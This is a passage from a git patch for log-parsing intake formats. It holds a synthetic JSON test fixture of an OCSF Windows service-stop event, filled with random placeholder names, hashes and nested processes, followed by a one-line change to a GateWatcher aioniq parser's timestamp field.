\"Louisiana\", \"type\": \"System\", \"uid\": \"290b1514-a0cf-11ef-9bd3-0242ac110007\", \"type_id\": 3, \"credential_uid\": \"290b1cbc-a0cf-11ef-8f91-0242ac110007\", \"risk_level\": \"Info\", \"risk_level_id\": 0}, \"uid\": \"290b241e-a0cf-11ef-89bc-0242ac110007\", \"cmd_line\": \"skins shipments proteins\", \"created_time\": 1731399707904, \"parent_process\": {\"name\": \"Almost\", \"pid\": 53, \"user\": {\"name\": \"Subscription\", \"type\": \"User\", \"domain\": \"lion aims yukon\", \"uid\": \"290b388c-a0cf-11ef-81e2-0242ac110007\", \"type_id\": 1}, \"uid\": \"290b3f44-a0cf-11ef-856f-0242ac110007\", \"cmd_line\": \"bidding lauren confusion\", \"created_time\": 1731399707905, \"parent_process\": {\"name\": \"Word\", \"pid\": 11, \"session\": {\"count\": 9, \"issuer\": \"practice attempt court\", \"created_time\": 1731399707905, \"is_remote\": true, \"is_vpn\": true}, \"file\": {\"attributes\": 44, \"name\": \"consistency.sln\", \"type\": \"Character Device\", \"version\": \"1.3.0\", \"path\": \"handbags camera urgent/forecast.gz/consistency.sln\", \"ext\": \"entity fe blocking\", \"type_id\": 3, \"parent_folder\": \"handbags camera urgent/forecast.gz\", \"hashes\": [{\"value\": \"6D17DA8FAF5A7C8BD04AFB00506B03897D0DE6A8D7B4EBD644B680ACB98A1CFE8924C0F11BCCA03BFC8D47BE350C1C8A20AF62D4E02D978CB8159FB2D49086A7\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}, {\"value\": \"BE412112026B3DCAEC7BE421BA9D884A2FBC5C9795F336CCBD0E8C76BFF312AA3BAFBB4BA71F540A076F5C0D8189254B397357A086D5B86B7D794FDCE6FCCFC1\", \"algorithm\": \"CTPH\", \"algorithm_id\": 5}], \"is_system\": true}, \"user\": {\"type\": \"Unknown\", \"uid\": \"290b69f6-a0cf-11ef-a847-0242ac110007\", \"type_id\": 0}, \"uid\": \"290b720c-a0cf-11ef-a98d-0242ac110007\", \"cmd_line\": \"fears demanding stewart\", \"created_time\": 1731399707906, \"integrity\": \"High\", \"integrity_id\": 4, \"parent_process\": {\"name\": \"Kinds\", \"pid\": 63, \"session\": {\"uid\": \"290b83d2-a0cf-11ef-9629-0242ac110007\", \"uuid\": \"290b89cc-a0cf-11ef-89ef-0242ac110007\", \"issuer\": \"tray lying x\", \"created_time\": 1731399707907, \"is_remote\": true}, \"file\": {\"name\": \"concerns.cab\", \"type\": \"Character Device\", \"version\": \"1.3.0\", \"path\": \"faq payable progressive/part.m3u/concerns.cab\", \"ext\": \"imported supplements prepaid\", \"type_id\": 3, \"mime_type\": \"garmin/popularity\", \"parent_folder\": \"faq payable progressive/part.m3u\", \"hashes\": [{\"value\": \"E8A5CF21ECCC4DB4DAAFDD5BD0140861637D937597AD8EE0246E0715031FE6BDABB4F5B16FDDCACD9722B57A18B46453B01D984E3D55292FB82825C3A06E516A\", \"algorithm\": \"CTPH\", \"algorithm_id\": 5}, {\"value\": \"4B9E4636494461CF31094E9A16F456FE\", \"algorithm\": \"MD5\", \"algorithm_id\": 1}]}, \"user\": {\"type\": \"remarkable\", \"type_id\": 99, \"full_name\": \"Jennell Sidney\", \"email_addr\": \"Clayton@scanned.travel\", \"ldap_person\": {\"location\": {\"desc\": \"Monaco, Principality of\", \"city\": \"Phil clarity\", \"country\": \"MC\", \"coordinates\": [113.7672, 53.7852], \"continent\": \"Europe\"}, \"given_name\": \"rachel trio electronics\", \"ldap_cn\": \"accessory fancy shelter\"}}, \"uid\": \"290babfa-a0cf-11ef-a1ee-0242ac110007\", \"cmd_line\": \"tuner clara concepts\", \"created_time\": 1731399707908, \"integrity\": \"boxes x day\", \"parent_process\": {\"name\": \"Animated\", \"pid\": 43, \"file\": {\"name\": \"pgp.rom\", \"type\": \"Symbolic Link\", \"path\": \"percent obtaining influenced/liked.bmp/pgp.rom\", \"signature\": {\"digest\": {\"value\": \"0A6CFE12D4BE13BD525E0097949ED52B4E032606B7BF98076581F2189F23342568BE12B631EF1F25F82E1979FC852ECA24E8A38B319B071638C3153E4DA60740\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}, \"certificate\": {\"version\": \"1.3.0\", \"uid\": \"290bcd06-a0cf-11ef-8f86-0242ac110007\", \"is_self_signed\": true, \"subject\": \"brilliant follow county\", \"issuer\": \"suppliers workout deposit\", \"fingerprints\": [{\"value\": \"03114C6B1064C1C04AE3C88FA18F582A2228B88A7786BBFCBCE275DED7A5C23A\", \"algorithm\": \"magic\", \"algorithm_id\": 99}, {\"value\": \"F07D26D3B025D5EF30B38458926092E990C3B6F0BE1A23B561D778E8467319E0444B2425FDEDB91121554B8641B06B3654426F63C9C0435C6487571DC9AE0FC5\", \"algorithm\": \"SHA-512\", \"algorithm_id\": 4}], \"created_time\": 1731399707908, \"expiration_time\": 1731399707909, \"serial_number\": \"hazard compaq emirates\"}, \"algorithm\": \"Unknown\", \"algorithm_id\": 0, \"created_time\": 1731399707909}, \"type_id\": 7, \"accessor\": {\"name\": \"Athletes\", \"type\": \"System\", \"uid\": \"290bdfe4-a0cf-11ef-88a6-0242ac110007\", \"org\": {\"name\": \"publicity porsche shoulder\", \"uid\": \"290bebf6-a0cf-11ef-bcbf-0242ac110007\", \"ou_name\": \"wins separate lemon\"}, \"groups\": [{\"name\": \"jose quotes toolbar\", \"uid\": \"290c038e-a0cf-11ef-beec-0242ac110007\"}], \"type_id\": 3, \"email_addr\": \"Sherry@machinery.store\", \"risk_level\": \"Low\", \"risk_level_id\": 1, \"risk_score\": 25}, \"company_name\": \"Lashell Vincent\", \"mime_type\": \"representing/lee\", \"parent_folder\": \"percent obtaining influenced/liked.bmp\", \"hashes\": [{\"value\": \"E2F3E36EA43BA45AB3503CED0A944CD1A950065C\", \"algorithm\": \"SHA-1\", \"algorithm_id\": 2}, {\"value\": \"37DB034AE21206C4451CA1E72F6D031F77B7D0A27FF50009CFBECB868E7DE5C6\", \"algorithm\": \"magic\", \"algorithm_id\": 99}], \"security_descriptor\": \"october surrey en\"}, \"uid\": \"290c11c6-a0cf-11ef-90cb-0242ac110007\", \"cmd_line\": \"wires wheels mf\", \"created_time\": 1731399707910, \"parent_process\": {\"name\": \"Petite\", \"pid\": 26, \"file\": {\"name\": \"difficulty.deskthemepack\", \"owner\": {\"name\": \"Costa\", \"type\": \"Unknown\", \"uid\": \"290c33c2-a0cf-11ef-87c6-0242ac110007\", \"type_id\": 0, \"ldap_person\": {\"manager\": {\"name\": \"Genetics\", \"type\": \"User\", \"domain\": \"gotta shades electron\", \"type_id\": 1, \"account\": {\"name\": \"hood consortium conversion\", \"type\": \"Windows Account\", \"uid\": \"290c4970-a0cf-11ef-8a6a-0242ac110007\", \"labels\": [\"dose\"], \"type_id\": 2}, \"risk_level\": \"High\", \"risk_level_id\": 3}, \"created_time\": 1731399707912, \"job_title\": \"bestsellers exactly diffs\", \"leave_time\": 1731399707912, \"surname\": \"responded pasta killed\"}}, \"type\": \"Symbolic Link\", \"path\": \"dimensions achieving ordinary/painting.sys/difficulty.deskthemepack\", \"product\": {\"name\": \"implications pizza christmas\", \"version\": \"1.3.0\", \"uid\": \"290c597e-a0cf-11ef-b883-0242ac110007\", \"vendor_name\": \"amateur faith fell\"}, \"uid\": \"290c6086-a0cf-11ef-90f6-0242ac110007\", \"ext\": \"transexuales sas operate\", \"type_id\": 7, \"accessor\": {\"name\": \"Giants\", \"type\": \"System\", \"domain\": \"pressure girl facility\", \"uid\": \"290c722e-a0cf-11ef-b5e2-0242ac110007\", \"type_id\": 3, \"full_name\": \"Marcene Goldie\", \"risk_score\": 35}, \"parent_folder\": \"dimensions achieving ordinary/painting.sys\", \"confidentiality\": \"Restricted\", \"confidentiality_id\": 6, \"created_time\": 1731399707913, \"hashes\": [{\"value\": \"B7B6604452EAF6AB6947459B4FA35CDFDCA39605BF415F77DDD90B47B7AE74ACC2BD0AB274FFC18792A7B43A7EE661EA8098EA69E1D0483392690A4D0BFFA60D\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}], \"is_system\": true, \"xattributes\": {}}, \"user\": {\"type\": \"eau\", \"domain\": \"meaning feedback jan\", \"uid\": \"290c8624-a0cf-11ef-97f7-0242ac110007\", \"type_id\": 99, \"credential_uid\": \"290c8e30-a0cf-11ef-9434-0242ac110007\"}, \"created_time\": 1731399707913, \"parent_process\": {\"name\": \"Yards\", \"pid\": 15, \"file\": {\"name\": \"williams.xhtml\", \"type\": \"Folder\", \"path\": \"thailand diameter love/rachel.java/williams.xhtml\", \"signature\": {\"state\": \"diffs seasons conflicts\", \"certificate\": {\"version\": \"1.3.0\", \"is_self_signed\": false, \"subject\": \"ethernet suitable brandon\", \"issuer\": \"optimization earliest differently\", \"fingerprints\": [{\"value\": \"BDD5C7FF933889BB4DE51943D295A2C3BF3CCE0EE5D7196DB36A7B734E44B9478FE798F4A6E72C0FB13B30746C0434F713614EBDB498B03029382CF837E23878\", \"algorithm\": \"SHA-512\", \"algorithm_id\": 4}, {\"value\": \"DEE5E5BE829C1FF9E773E27CDA4A8960CAB5C8A6F392DA6ACCBACB430B13B9BC64822221325357EAA87B60D5F4474090332CD89561EBEC061294834301DF9AE9\", \"algorithm\": \"TLSH\", \"algorithm_id\": 6}], \"created_time\": 1731399707914, \"expiration_time\": 1731399707914, \"serial_number\": \"photographer tax up\"}, \"algorithm\": \"RSA\", \"algorithm_id\": 2}, \"uid\": \"290cc5f8-a0cf-11ef-92a0-0242ac110007\", \"ext\": \"alien cafe barriers\", \"type_id\": 2, \"parent_folder\": \"thailand diameter love/rachel.java\", \"confidentiality\": \"Private\", \"confidentiality_id\": 5, \"hashes\": [{\"value\": \"2B831F21DC87C2B301C73A0ACE1A47E607F1C5210E766355BD25B4E47948BBB20B677EE6C92C70765B352A0CCC29C89AB8D8D3489DEE0CCD7EDE26C6BDF6508F\", \"algorithm\": \"TLSH\", \"algorithm_id\": 6}], \"security_descriptor\": \"se diabetes vitamin\"}, \"user\": {\"name\": \"Caps\", \"type\": \"System\", \"uid\": \"290cd5ca-a0cf-11ef-80bf-0242ac110007\", \"type_id\": 3, \"full_name\": \"Eve Roger\", \"account\": {\"name\": \"clearing deviant confidential\", \"type\": \"Apple Account\", \"uid\": \"290ce038-a0cf-11ef-8ee9-0242ac110007\", \"type_id\": 8}, \"email_addr\": \"Renda@antivirus.int\", \"uid_alt\": \"forced jvc archives\"}, \"uid\": \"290ce786-a0cf-11ef-9fc4-0242ac110007\", \"cmd_line\": \"reuters revolution thermal\", \"created_time\": 1731399707916, \"lineage\": [\"settled household february\", \"countries implemented chinese\"], \"parent_process\": {\"name\": \"Unions\", \"pid\": 41, \"file\": {\"name\": \"groups.part\", \"size\": 2002602281, \"type\": \"Character Device\", \"version\": \"1.3.0\", \"path\": \"alice gnome diploma/consent.tex/groups.part\", \"product\": {\"name\": \"useful yen synopsis\", \"version\": \"1.3.0\", \"uid\": \"290d29f8-a0cf-11ef-a1a1-0242ac110007\", \"feature\": {\"name\": \"spider victor principle\", \"version\": \"1.3.0\", \"uid\": \"290d3420-a0cf-11ef-bd6a-0242ac110007\"}, \"url_string\": \"disagree\", \"vendor_name\": \"ist covered rock\"}, \"uid\": \"290d3b32-a0cf-11ef-bdef-0242ac110007\", \"ext\": \"glory regards somewhere\", \"type_id\": 3, \"company_name\": \"Melida Rosina\", \"parent_folder\": \"alice gnome diploma/consent.tex\", \"accessed_time\": 1731399707918, \"confidentiality\": \"Restricted\", \"confidentiality_id\": 6, \"hashes\": [{\"value\": \"A07C6F758C9EF024F836E2C0BD10FE9C43126081A22D73DD8040D8D179B10DEBE3BC9356500F5C7F0BA87256EFA37A673C190A0AC6F0BFC0529F9FC303878B00\", \"algorithm\": \"TLSH\", \"algorithm_id\": 6}], \"security_descriptor\": \"isa action je\"}, \"user\": {\"name\": \"Messaging\", \"type\": \"System\", \"uid\": \"290d4c1c-a0cf-11ef-8059-0242ac110007\", \"type_id\": 3, \"risk_level\": \"High\", \"risk_level_id\": 3}, \"uid\": \"290d52b6-a0cf-11ef-9425-0242ac110007\", \"cmd_line\": \"rent seed gentleman\", \"created_time\": 1731399707918, \"lineage\": [\"pockets sponsor exactly\", \"disability syntax print\"], \"parent_process\": {\"name\": \"Corrections\", \"pid\": 10, \"file\": {\"name\": \"groove.xlsx\", \"owner\": {\"name\": \"February\", \"type\": \"User\", \"uid\": \"290d70de-a0cf-11ef-86d6-0242ac110007\", \"type_id\": 1, \"credential_uid\": \"290d775a-a0cf-11ef-afe6-0242ac110007\", \"email_addr\": \"Helena@songs.net\", \"risk_level\": \"High\", \"risk_level_id\": 3}, \"type\": \"Folder\", \"version\": \"1.3.0\", \"path\": \"announces contamination leisure/bits.kml/groove.xlsx\", \"signature\": {\"certificate\": {\"version\": \"1.3.0\", \"uid\": \"290d9a32-a0cf-11ef-b46e-0242ac110007\", \"is_self_signed\": false, \"subject\": \"conferences kingdom charge\", \"issuer\": \"characterization relatively cas\", \"fingerprints\": [{\"value\": \"90F747EBF0E276407987570F6D39812AC53223E174E41CEDDD291A5F7136E3A6BEF9257C3C73FE3B92D5149E8E1C1BE08A61940CEB8AF03510E22E0492752C18\", \"algorithm\": \"SHA-512\", \"algorithm_id\": 4}, {\"value\": \"63C326C6244EB0474D3008256E1217754BD2B836E98C247D0A19A57BF2AB18C7FF3D6BF574DB7E31FED2EEC3DA9B7CB69EDDD8DC256FEB8D5E822F176D8444A9\", \"algorithm\": \"CTPH\", \"algorithm_id\": 5}], \"created_time\": 1731399707920, \"expiration_time\": 1731399707920, \"serial_number\": \"seed stupid slide\"}, \"algorithm\": \"RSA\", \"algorithm_id\": 2, \"developer_uid\": \"290da806-a0cf-11ef-a0a5-0242ac110007\"}, \"ext\": \"retired penn graduated\", \"type_id\": 2, \"parent_folder\": \"announces contamination leisure/bits.kml\", \"hashes\": [{\"value\": \"2A7F70F5957828EEA5C62064B4EB2A32561EB5B3003D729F2605228F225A85EF528EF7666F79B2810432D7E39CB959670A2EA9B1EDEB258E107F47E68D114FEC\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}], \"modified_time\": 1731399707921}, \"user\": {\"name\": \"Diagram\", \"type\": \"System\", \"domain\": \"existing jun treasury\", \"uid\": \"290db904-a0cf-11ef-aa9a-0242ac110007\", \"org\": {\"name\": \"coding maria scenarios\", \"uid\": \"290dc340-a0cf-11ef-9323-0242ac110007\"}, \"type_id\": 3, \"risk_score\": 79}, \"uid\": \"290dca20-a0cf-11ef-b98e-0242ac110007\", \"cmd_line\": \"mechanical estimates again\", \"created_time\": 1731399707921, \"parent_process\": {\"name\": \"Tabs\", \"pid\": 55, \"session\": {\"uid\": \"290deae6-a0cf-11ef-b636-0242ac110007\", \"issuer\": \"rat employer stadium\", \"created_time\": 1731399707922, \"credential_uid\": \"290df4e6-a0cf-11ef-9290-0242ac110007\", \"expiration_time\": 1731399707922, \"is_remote\": true, \"is_vpn\": true}, \"file\": {\"name\": \"integral.cpl\", \"owner\": {\"type\": \"sphere\", \"domain\": \"entirely gale inc\", \"type_id\": 99, \"account\": {\"name\": \"suits kim intellectual\", \"type\": \"AWS IAM User\", \"uid\": \"290e0f3a-a0cf-11ef-92a9-0242ac110007\", \"type_id\": 3}, \"risk_level\": \"carpet diamond departure\", \"uid_alt\": \"meta spank counts\"}, \"size\": 3671310304, \"type\": \"Symbolic Link\", \"path\": \"normal holds match/terrible.iso/integral.cpl\", \"modifier\": {\"name\": \"Acids\", \"type\": \"typing\", \"type_id\": 99}, \"uid\": \"290e1bec-a0cf-11ef-a719-0242ac110007\", \"ext\": \"stated smooth principles\", \"type_id\": 7, \"company_name\": \"Jeremiah Sonny\", \"parent_folder\": \"normal holds match/terrible.iso\", \"hashes\": [{\"value\": \"C449C98FCC2EDC7FE87FAF3FEF6C9D3F5499ACDC3BAC774F19D7B447B333103DCFED31CCAC83F9EE9D1E9601282E92EDA75DAEA8140D8C7EB9220338803C8D6E\", \"algorithm\": \"Unknown\", \"algorithm_id\": 0}]}, \"user\": {\"name\": \"Reduce\", \"type\": \"Admin\", \"domain\": \"preceding expressions your\", \"uid\": \"290e30c8-a0cf-11ef-8f59-0242ac110007\", \"groups\": [{\"name\": \"struggle photoshop walking\", \"desc\": \"sleep quoted able\", \"uid\": \"290e3b2c-a0cf-11ef-b7cf-0242ac110007\"}, {\"name\": \"ethiopia evaluate lover\", \"desc\": \"partition sound composition\"}], \"type_id\": 2, \"full_name\": \"Marisha Wesley\", \"ldap_person\": {\"cost_center\": \"spank universal techniques\", \"deleted_time\": 1731399707924, \"ldap_cn\": \"sight tale town\", \"leave_time\": 1731399707924, \"modified_time\": 1731399707924}}, \"uid\": \"290e4748-a0cf-11ef-8355-0242ac110007\", \"cmd_line\": \"flower arrest reveal\", \"created_time\": 1731399707925, \"parent_process\": {\"name\": \"Dip\", \"pid\": 99, \"session\": {\"uid\": \"290e5cb0-a0cf-11ef-8142-0242ac110007\", \"uuid\": \"290e63f4-a0cf-11ef-942e-0242ac110007\", \"issuer\": \"spirits up oral\", \"expiration_time\": 1731399707925, \"is_mfa\": false, \"is_remote\": true}, \"file\": {\"name\": \"fantasy.m4v\", \"owner\": {\"name\": \"Worse\", \"type\": \"User\", \"uid\": \"290e7628-a0cf-11ef-8429-0242ac110007\", \"groups\": [{\"name\": \"pierce deutschland scout\", \"type\": \"sacred mongolia edt\", \"uid\": \"290e8712-a0cf-11ef-b60b-0242ac110007\"}], \"type_id\": 1, \"full_name\": \"Tomika Renato\"}, \"type\": \"Regular File\", \"path\": \"approaches malpractice basics/lifetime.dxf/fantasy.m4v\", \"desc\": \"loops charm mpegs\", \"ext\": \"pork picked investigations\", \"type_id\": 1, \"parent_folder\": \"approaches malpractice basics/lifetime.dxf\", \"accessed_time\": 1731399707926, \"confidentiality\": \"subjective\", \"confidentiality_id\": 99, \"hashes\": [{\"value\": \"DB1A6CE0E4C6F3924C7CCA74924F4B0EF8BC0031\", \"algorithm\": \"SHA-1\", \"algorithm_id\": 2}, {\"value\": \"2B9A99087B9991B5EAD9406E2CAC8DA385815E6C3FA4DA96E1487782280E8E82FDBD3536F85994E271610D72C5A62E6F027E0CD37DA05806289882A1440BD441\", \"algorithm\": \"Unknown\", \"algorithm_id\": 0}], \"xattributes\": {}}, \"user\": {\"name\": \"Expects\", \"type\": \"System\", \"domain\": \"blade keith manga\", \"uid\": \"290e9ba8-a0cf-11ef-9a18-0242ac110007\", \"type_id\": 3, \"account\": {\"name\": \"swedish ol flexible\", \"type\": \"GCP Account\", \"uid\": \"290ea6ca-a0cf-11ef-9b3b-0242ac110007\", \"type_id\": 5}, \"risk_level\": \"world feelings championships\"}, \"uid\": \"290eadbe-a0cf-11ef-9668-0242ac110007\", \"cmd_line\": \"iowa gear scheduling\", \"created_time\": 1731399707927, \"integrity\": \"Medium\", \"integrity_id\": 3, \"lineage\": [\"maximize associations reynolds\"], \"parent_process\": {\"name\": \"Themes\", \"pid\": 45, \"file\": {\"name\": \"designers.rpm\", \"type\": \"Named Pipe\", \"path\": \"votes year mice/fort.gpx/designers.rpm\", \"uid\": \"290edaaa-a0cf-11ef-aa5d-0242ac110007\", \"ext\": \"keyboards yet ask\", \"type_id\": 6, \"mime_type\": \"motorola/patrick\", \"parent_folder\": \"votes year mice/fort.gpx\", \"created_time\": 1731399707928, \"hashes\": [{\"value\": \"02FA8D46FB2AC65EE42912604250A146AF74C6B8CFF1ACD09BC5F460FB9850CAD2674F76F982ED052C78D178196ED4C10256E2BC50E191DBB82F625CAD071090\", \"algorithm\": \"Unknown\", \"algorithm_id\": 0}, {\"value\": \"BA1DB3B5141AA0FBF3DD4F6839F49B0B88809121634B4BB39272A838924DDEA2E4D1EBDB9E5F8F8AD90243DBD2A7D2D5497D828BD12E5590FB27483AA1287CD3\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}], \"modified_time\": 1731399707928}, \"user\": {\"name\": \"Ongoing\", \"uid\": \"290ee9a0-a0cf-11ef-ac76-0242ac110007\", \"credential_uid\": \"290ef076-a0cf-11ef-adb8-0242ac110007\"}, \"tid\": 6, \"uid\": \"290ef99a-a0cf-11ef-a3ec-0242ac110007\", \"cmd_line\": \"correction weapon gaming\", \"created_time\": 1731399707929, \"parent_process\": {\"name\": \"Voyeurweb\", \"pid\": 45, \"file\": {\"name\": \"varied.php\", \"type\": \"Named Pipe\", \"path\": \"mba francis sony/tend.xml/varied.php\", \"signature\": {\"certificate\": {\"version\": \"1.3.0\", \"is_self_signed\": true, \"subject\": \"undo nickname stay\", \"issuer\": \"yugoslavia how precisely\", \"fingerprints\": [{\"value\": \"BD87A5FFC4117A0F11094CA6BA6A838013BE215959B7358980553B0360822DD67CACADAFA42D71AB48C4EA3EED5F2491D079661CEB0A7694FFA439EB7743CC04\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}, {\"value\": \"4194D1706ED1F408D5E02D672777019F4D5385C766A8C6CA8ACBA3167D36A7B9\", \"algorithm\": \"SHA-256\", \"algorithm_id\": 3}], \"created_time\": 1731399707930, \"expiration_time\": 1731399707930, \"serial_number\": \"extraction cabin lions\"}, \"algorithm\": \"Unknown\", \"algorithm_id\": 0, \"created_time\": 1731399707930}, \"ext\": \"nicholas doing fraud\", \"type_id\": 6, \"mime_type\": \"nextel/himself\", \"parent_folder\": \"mba francis sony/tend.xml\", \"hashes\": [{\"value\": \"21EA6263C16406DFC344CF7CB2A129B97FD2ECF367C828208CBBEDA6599B989F6C2C3DCB1BDF581ABC97201CF64FFBC0D7415F00564F6D80A92C7FFE7037894C\", \"algorithm\": \"SHA-512\", \"algorithm_id\": 4}, {\"value\": \"7ED6BDBCCADC1CB9DFEA88CA33B6A9346EAE030FF7E9FADD4C23359C0EA7390D\", \"algorithm\": \"magic\", \"algorithm_id\": 99}], \"security_descriptor\": \"islands interventions removable\", \"xattributes\": {}}, \"user\": {\"name\": \"Soldier\", \"type\": \"User\", \"uid\": \"290f2596-a0cf-11ef-8caf-0242ac110007\", \"type_id\": 1, \"account\": {\"name\": \"ford doug cigarette\", \"type\": \"Mac OS Account\", \"uid\": \"290f3090-a0cf-11ef-9ad3-0242ac110007\", \"type_id\": 7}}, \"uid\": \"290f36e4-a0cf-11ef-bdab-0242ac110007\", \"cmd_line\": \"generally alberta anthropology\", \"created_time\": 1731399707931, \"parent_process\": {\"name\": \"Spirits\", \"pid\": 86, \"file\": {\"name\": \"flights.flv\", \"type\": \"Regular File\", \"version\": \"1.3.0\", \"path\": \"str inner working/pose.h/flights.flv\", \"ext\": \"general became bermuda\", \"type_id\": 1, \"parent_folder\": \"str inner working/pose.h\", \"hashes\": [{\"value\": \"DC684E0A948E820C9B32AE34F0E147CCCAEAB3646C95D1FBF6E5EA257B9107251945EB892CD81A3750D89799ADF86C76382C60E73A85B10D110CE39164882C8F\", \"algorithm\": \"SHA-512\", \"algorithm_id\": 4}, {\"value\": \"CCD823CAF8108F62C012B02D4C233DA76EACF9FDEA959B9DD909ADF1ECC01BD5F184FC7904184E5A6F296850D7102AAF79E8606629B877723DEC951A67E1B193\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}], \"modified_time\": 1731399707932}, \"uid\": \"290f6ac4-a0cf-11ef-bc5e-0242ac110007\", \"cmd_line\": \"sense terrorism hl\", \"created_time\": 1731399707932, \"parent_process\": {\"name\": \"Moving\", \"pid\": 43, \"file\": {\"attributes\": 25, \"name\": \"comparison.pages\", \"owner\": {\"name\": \"Infringement\", \"type\": \"User\", \"uid\": \"290f864e-a0cf-11ef-9828-0242ac110007\", \"groups\": [{\"name\": \"coordinate registration browse\", \"desc\": \"attorney ya walked\", \"uid\": \"290f974c-a0cf-11ef-a918-0242ac110007\"}], \"type_id\": 1, \"risk_level\": \"Critical\", \"risk_level_id\": 4, \"risk_score\": 55, \"uid_alt\": \"licenses cir vacancies\"}, \"type\": \"Unknown\", \"path\": \"lows fc focusing/canvas.pptx/comparison.pages\", \"modifier\": {\"type\": \"User\", \"uid\": \"290fa3ea-a0cf-11ef-b1b2-0242ac110007\", \"groups\": [{\"name\": \"bedroom positions win\", \"desc\": \"amazon feof extras\", \"uid\": \"290fae44-a0cf-11ef-9db8-0242ac110007\"}, {\"name\": \"came swingers colon\", \"uid\": \"290fb646-a0cf-11ef-b3ed-0242ac110007\"}], \"type_id\": 1, \"ldap_person\": {\"employee_uid\": \"290fc050-a0cf-11ef-aac9-0242ac110007\", \"job_title\": \"constitutional ricky jonathan\", \"ldap_dn\": \"marketplace ranch counting\"}, \"risk_score\": 0, \"uid_alt\": \"riding indicate wiley\"}, \"ext\": \"specification cialis inherited\", \"type_id\": 0, \"parent_folder\": \"lows fc focusing/canvas.pptx\", \"confidentiality\": \"engineers families bull\", \"hashes\": [{\"value\": \"F081F7B8D4310E67A7572F60B6070A3034D5F1AE1465B3FE4F8DAFCA9213A0E3\", \"algorithm\": \"SHA-256\", \"algorithm_id\": 3}, {\"value\": \"EAF741D48E0F26CA709BF17829C53A65D420FBD1F01B0F87BDE25230F1FF332E3D2BE89488F8277FA4B22FF53CC04FF382B19F42B7AC34C3EA5A0C0A89B19FCA\", \"algorithm\": \"CTPH\", \"algorithm_id\": 5}]}, \"user\": {\"name\": \"Worn\", \"type\": \"Admin\", \"domain\": \"threatening parks application\", \"uid\": \"290fd5fe-a0cf-11ef-ab0d-0242ac110007\", \"type_id\": 2, \"risk_level\": \"High\", \"risk_level_id\": 3}, \"uid\": \"290fde14-a0cf-11ef-9211-0242ac110007\", \"loaded_modules\": [\"/yacht/payday/singer/stretch/hungry.heic\", \"/fa/bumper/represents/studio/shipments.ttf\"], \"cmd_line\": \"shopping appendix deluxe\", \"created_time\": 1731399707935, \"terminated_time\": 1731399707935}, \"xattributes\": {}}, \"xattributes\": {}}, \"terminated_time\": 1731399707935}}, \"terminated_time\": 1731399707935}}}, \"terminated_time\": 1731399707935}, \"sandbox\": \"snowboard lookup done\"}}}}, \"sandbox\": \"broke alternatives excessive\", \"xattributes\": {}}, \"sandbox\": \"mba ambassador shopping\"}}, \"terminated_time\": 1731399707935}}, \"user\": {\"name\": \"Hearing\", \"type\": \"Admin\", \"domain\": \"thinking answered refurbished\", \"uid\": \"290fefee-a0cf-11ef-ba87-0242ac110007\", \"type_id\": 2, \"ldap_person\": {\"email_addrs\": [\"Melodee@automotive.mobi\", \"Lulu@baby.name\"], \"employee_uid\": \"290ffac0-a0cf-11ef-a362-0242ac110007\", \"leave_time\": 1731399707936, \"office_location\": \"podcast cds lloyd\"}, \"risk_level\": \"Low\", \"risk_level_id\": 1, \"risk_score\": 22}}, \"severity_id\": 3, \"status_code\": \"present\", \"status_detail\": \"shade accidents alice\", \"status_id\": 2, \"win_service\": {\"name\": \"balance pgp seasonal\", \"version\": \"1.3.0\", \"uid\": \"29101582-a0cf-11ef-a560-0242ac110007\", \"cmd_line\": \"honduras usa fact\", \"service_dependencies\": [\"enhancements occupations cause\", \"sw verification promotion\"], \"service_start_type\": \"Auto\", \"service_start_type_id\": 3, \"service_start_name\": \"golden thumbs crest\"}}", + "event": { + "action": "stop", + "category": [], + "outcome": "failure", + "provider": "foo canada biodiversity", + "reason": "gear technologies garlic", + "severity": 3, + "start": "2024-11-12T08:21:47.936000Z", + "type": [] + }, + "@timestamp": "2024-11-12T08:21:47.936000Z", + "file": { + "directory": "vg tunisia river/favorite.wsf", + "hash": { + "sha1": "9280AE13A255F18D841739D0D18222BB950C8FC7" + }, + "name": "developmental.otf", + "path": "vg tunisia river/favorite.wsf/developmental.otf", + "type": "Regular File" + }, + "host": { + "id": "29092d44-a0cf-11ef-8baa-0242ac110007", + "risk": { + "static_level": "Critical" + }, + "type": "IDS" + }, + "ocsf": { + "activity_id": 4, + "activity_name": "Stop", + "class_name": "Windows Service Activity", + "class_uid": 201004, + "process": { + "parent": { + "user": { + "full_name": "Roland Nichol" + } + }, + "user": { + "domain": "tuition gst cheese", + "full_name": "Lynsey Sherise", + "groups": [ + { + "name": "overview friendly ul" + } + ] + } + } + }, + "process": { + "command_line": "hdtv il murder", + "entity_id": "2909c8d0-a0cf-11ef-82af-0242ac110007", + "name": "Don", + "parent": { + "command_line": "bull retailers sensitivity", + "end": "2024-11-12T08:21:47.935000Z", + "entity_id": "290a756e-a0cf-11ef-86a9-0242ac110007", + "name": "Indoor", + "pid": 29, + "start": "2024-11-12T08:21:47.900000Z", + "user": { + "id": [ + "290a520a-a0cf-11ef-a44f-0242ac110007" + ], + "name": "Asian" + } + }, + "pid": 38, + "start": "2024-11-12T08:21:47.895000Z", + "user": { + "id": [ + "2909b99e-a0cf-11ef-946c-0242ac110007" + ], + "name": "Journal" + } + }, + "related": { + "hash": [ + "9280AE13A255F18D841739D0D18222BB950C8FC7" + ], + "user": [ + "Hearing" + ] + }, + "user": { + "domain": "thinking answered refurbished", + "id": "290fefee-a0cf-11ef-ba87-0242ac110007", + "name": "Hearing" + } + } +} \ No newline at end of file From b03ca79d59d45dcd12914df6cd8e3532e5912016 Mon Sep 17 00:00:00 2001 From: Clement Lyonnet Date: Tue, 12 Nov 2024 10:23:11 +0100 Subject: [PATCH 019/150] Fixing parsed_date to match with detection and not analysis --- GateWatcher/aioniq/ingest/parser.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/GateWatcher/aioniq/ingest/parser.yml b/GateWatcher/aioniq/ingest/parser.yml index 45330587a..ba98a034e 100644 --- a/GateWatcher/aioniq/ingest/parser.yml +++ b/GateWatcher/aioniq/ingest/parser.yml @@ -10,7 +10,7 @@ pipeline: external: name: date.parse properties: - input_field: "{{json_load.message.timestamp_analyzed}}" + input_field: "{{json_load.message.timestamp_detected}}" output_field: datetime format: null timezone: UTC 